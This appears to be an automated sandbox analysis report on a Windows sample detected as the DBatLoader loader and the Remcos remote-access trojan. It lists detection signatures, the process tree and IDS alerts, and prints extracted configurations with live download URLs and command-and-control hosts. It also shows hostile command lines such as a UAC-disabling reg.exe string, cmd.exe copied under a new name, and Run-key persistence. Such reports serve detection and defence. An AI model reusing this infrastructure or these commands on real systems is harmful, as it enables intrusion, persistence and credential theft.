
Windows Analysis Report
jlPBMMQbXC.exe

Overview

General Information

Sample name: jlPBMMQbXC.exe (renamed because the original name is a hash value)
Original sample name: 0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561.exe
Analysis ID: 1562864
MD5: a27b6de588ad4d4c0d6e0c656e580f4e
SHA1: 48d25bbc2e65bd22678ca45d2b53b4ca8ce8059f
SHA256: 0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

Detected families: DBatLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • jlPBMMQbXC.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\jlPBMMQbXC.exe" MD5: A27B6DE588AD4D4C0D6E0C656E580F4E)
    • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7624 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 7664 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SndVol.exe (PID: 7672 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Selebzih.PIF (PID: 7880 cmdline: "C:\Users\Public\Libraries\Selebzih.PIF" MD5: A27B6DE588AD4D4C0D6E0C656E580F4E)
    • SndVol.exe (PID: 7980 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Selebzih.PIF (PID: 8040 cmdline: "C:\Users\Public\Libraries\Selebzih.PIF" MD5: A27B6DE588AD4D4C0D6E0C656E580F4E)
    • colorcpl.exe (PID: 8136 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
DBatLoader configuration:
{"Download Url": ["https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1", "https://lightstone.ae/image/233_Selebzihtih"]}

Remcos configuration:
{"Host:Port:Password": ["pentester0.accesscam.org:56796:1", "archived.zapto.org:56797:1", "honeypotresearchteam.duckdns.org:13939:1"], "Assigned name": "Resignation Letter", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Resignation.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Resignation-X9RTX9", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "resignation", "Keylog folder": "wetransfer"}
Source | Rule | Description | Author | Strings (listed below the row where present)
0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x6c4b8:$a1: Remcos restarted by watchdog!
        • 0x6ca30:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
        • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6657c:$str_b2: Executing file:
        • 0x675fc:$str_b3: GetDirectListeningPort
        • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67128:$str_b7: \update.vbs
        • 0x665a4:$str_b9: Downloaded file:
        • 0x66590:$str_b10: Downloading file:
        • 0x66634:$str_b12: Failed to upload file:
        • 0x675c4:$str_b13: StartForward
        • 0x675e4:$str_b14: StopForward
        • 0x67080:$str_b15: fso.DeleteFile "
        • 0x67014:$str_b16: On Error Resume Next
        • 0x670b0:$str_b17: fso.DeleteFolder "
        • 0x66624:$str_b18: Uploaded file:
        • 0x665e4:$str_b19: Unable to delete:
        • 0x67048:$str_b20: while fso.FileExists("
        • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings (listed below the row where present)
15.2.colorcpl.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
15.2.colorcpl.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
15.2.colorcpl.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
15.2.colorcpl.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
              • 0x6c4b8:$a1: Remcos restarted by watchdog!
              • 0x6ca30:$a3: %02i:%02i:%02i:%03i
15.2.colorcpl.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
              • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6657c:$str_b2: Executing file:
              • 0x675fc:$str_b3: GetDirectListeningPort
              • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67128:$str_b7: \update.vbs
              • 0x665a4:$str_b9: Downloaded file:
              • 0x66590:$str_b10: Downloading file:
              • 0x66634:$str_b12: Failed to upload file:
              • 0x675c4:$str_b13: StartForward
              • 0x675e4:$str_b14: StopForward
              • 0x67080:$str_b15: fso.DeleteFile "
              • 0x67014:$str_b16: On Error Resume Next
              • 0x670b0:$str_b17: fso.DeleteFolder "
              • 0x66624:$str_b18: Uploaded file:
              • 0x665e4:$str_b19: Unable to delete:
              • 0x67048:$str_b20: while fso.FileExists("
              • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

              System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\jlPBMMQbXC.exe, ProcessId: 7280, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Selebzih.PIF, NewProcessName: C:\Users\Public\Libraries\Selebzih.PIF, OriginalFileName: C:\Users\Public\Libraries\Selebzih.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , ProcessId: 7880, ProcessName: Selebzih.PIF
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Selebzih.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jlPBMMQbXC.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Selebzih
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Selebzih.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jlPBMMQbXC.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Selebzih
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Selebzih.PIF, NewProcessName: C:\Users\Public\Libraries\Selebzih.PIF, OriginalFileName: C:\Users\Public\Libraries\Selebzih.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , ProcessId: 7880, ProcessName: Selebzih.PIF
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T08:12:14.259973+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49723 | 13.107.136.10 | 443 | TCP
2024-11-26T08:12:16.780726+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49729 | 13.107.136.10 | 443 | TCP
2024-11-26T08:12:22.042356+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49746 | 162.19.139.102 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T08:12:05.411791+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49831 | 103.186.117.159 | 56796 | TCP
2024-11-26T08:12:51.132303+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49763 | 103.186.117.159 | 56796 | TCP
2024-11-26T08:13:14.034543+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49813 | 103.186.117.159 | 13939 | TCP
2024-11-26T08:13:37.080639+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49823 | 103.186.117.159 | 56796 | TCP
2024-11-26T08:13:59.329994+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49824 | 103.186.117.159 | 13939 | TCP
2024-11-26T08:14:22.399426+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49825 | 103.186.117.159 | 56796 | TCP
2024-11-26T08:14:45.018684+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49826 | 103.186.117.159 | 13939 | TCP
2024-11-26T08:15:08.284779+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49827 | 103.186.117.159 | 56796 | TCP
2024-11-26T08:15:30.463623+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49828 | 103.186.117.159 | 13939 | TCP
2024-11-26T08:15:53.927407+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49829 | 103.186.117.159 | 56796 | TCP
2024-11-26T08:16:16.567390+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49830 | 103.186.117.159 | 13939 | TCP


              AV Detection

Source: jlPBMMQbXC.exe | Avira: detected
Source: archived.zapto.org | Avira URL Cloud: Label: malware
Source: honeypotresearchteam.duckdns.org | Avira URL Cloud: Label: malware
Source: C:\Users\Public\Libraries\Selebzih.PIF | Avira: detection malicious, Label: TR/AD.Nekark.mucip
Source: jlPBMMQbXC.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1", "https://lightstone.ae/image/233_Selebzihtih"]}
Source: 00000008.00000002.3861881906.00000000025DD000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["pentester0.accesscam.org:56796:1", "archived.zapto.org:56797:1", "honeypotresearchteam.duckdns.org:13939:1"], "Assigned name": "Resignation Letter", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Resignation.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Resignation-X9RTX9", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "resignation", "Keylog folder": "wetransfer"}
Source: C:\Users\Public\Libraries\Selebzih.PIF | ReversingLabs: Detection: 63%
Source: jlPBMMQbXC.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Users\Public\Libraries\Selebzih.PIF | Joe Sandbox ML: detected
Source: jlPBMMQbXC.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_291638C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_291638C8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_004338C8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_078045E5 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_078045E5
Source: SndVol.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

              Privilege Escalation

Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29137538 _wcslen,CoGetObject,8_2_29137538
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_00407538 _wcslen,CoGetObject,15_2_00407538
Source: jlPBMMQbXC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.136.10:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.139.102:443 -> 192.168.2.9:49746 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
              Source: Binary string: easinvoker.pdbH source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E41E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E44F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C55908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02C55908
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29138847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_29138847
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29137877 FindFirstFileW,FindNextFileW,8_2_29137877
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2917E8F9 FindFirstFileExA,8_2_2917E8F9
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2913BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_2913BB6B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29149B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_29149B86
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2913BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_2913BD72
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2914C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_2914C322
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2913C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_2913C388
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2913928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_2913928E
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_291396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_291396A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
